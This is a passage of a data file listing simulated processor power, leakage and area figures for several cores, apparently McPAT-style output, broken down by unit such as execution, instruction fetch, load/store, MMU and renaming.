'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.59398,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133989,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0968933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0990927,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0968971,
'Execution Unit/Register Files/Runtime Dynamic': 0.112492,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.234135,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.601487,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.69879,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00365895,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00142708,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00142347,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0134395,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0393685,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0952604,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.05938,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.360214,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.323547,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.57647,
'Instruction Fetch Unit/Runtime Dynamic': 0.831829,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0734183,
'L2/Runtime Dynamic': 0.0164294,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12483,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.41181,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.5678,
'Load Store Unit/Runtime Dynamic': 1.96598,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.230368,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.460737,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0817585,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.082562,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.37675,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0599378,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.676593,
'Memory Management Unit/Runtime Dynamic': 0.1425,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.0499,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.38203e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0189003,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.191359,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.210273,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.86579,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0495887,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241638,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.265616,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115524,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.186336,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0940563,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.395917,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0914043,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47088,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0501805,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0048456,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0536937,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0358362,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.103874,
'Execution Unit/Register Files/Runtime Dynamic': 0.0406818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.125518,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.311915,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39553,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000322059,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00013364,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00051479,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00153872,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00277904,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0344503,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19133,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0797619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.5162,
'Instruction Fetch Unit/Runtime Dynamic': 0.235539,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0462159,
'L2/Runtime Dynamic': 0.00399916,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59016,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.654742,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.043774,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.043774,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79687,
'Load Store Unit/Runtime Dynamic': 0.914394,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215879,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0383079,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130814,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358164,
'Memory Management Unit/Runtime Dynamic': 0.0520816,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7778,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.132002,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00681857,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0567221,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.195543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79709,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0980777,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.621299,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189316,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.30536,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154135,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.648812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
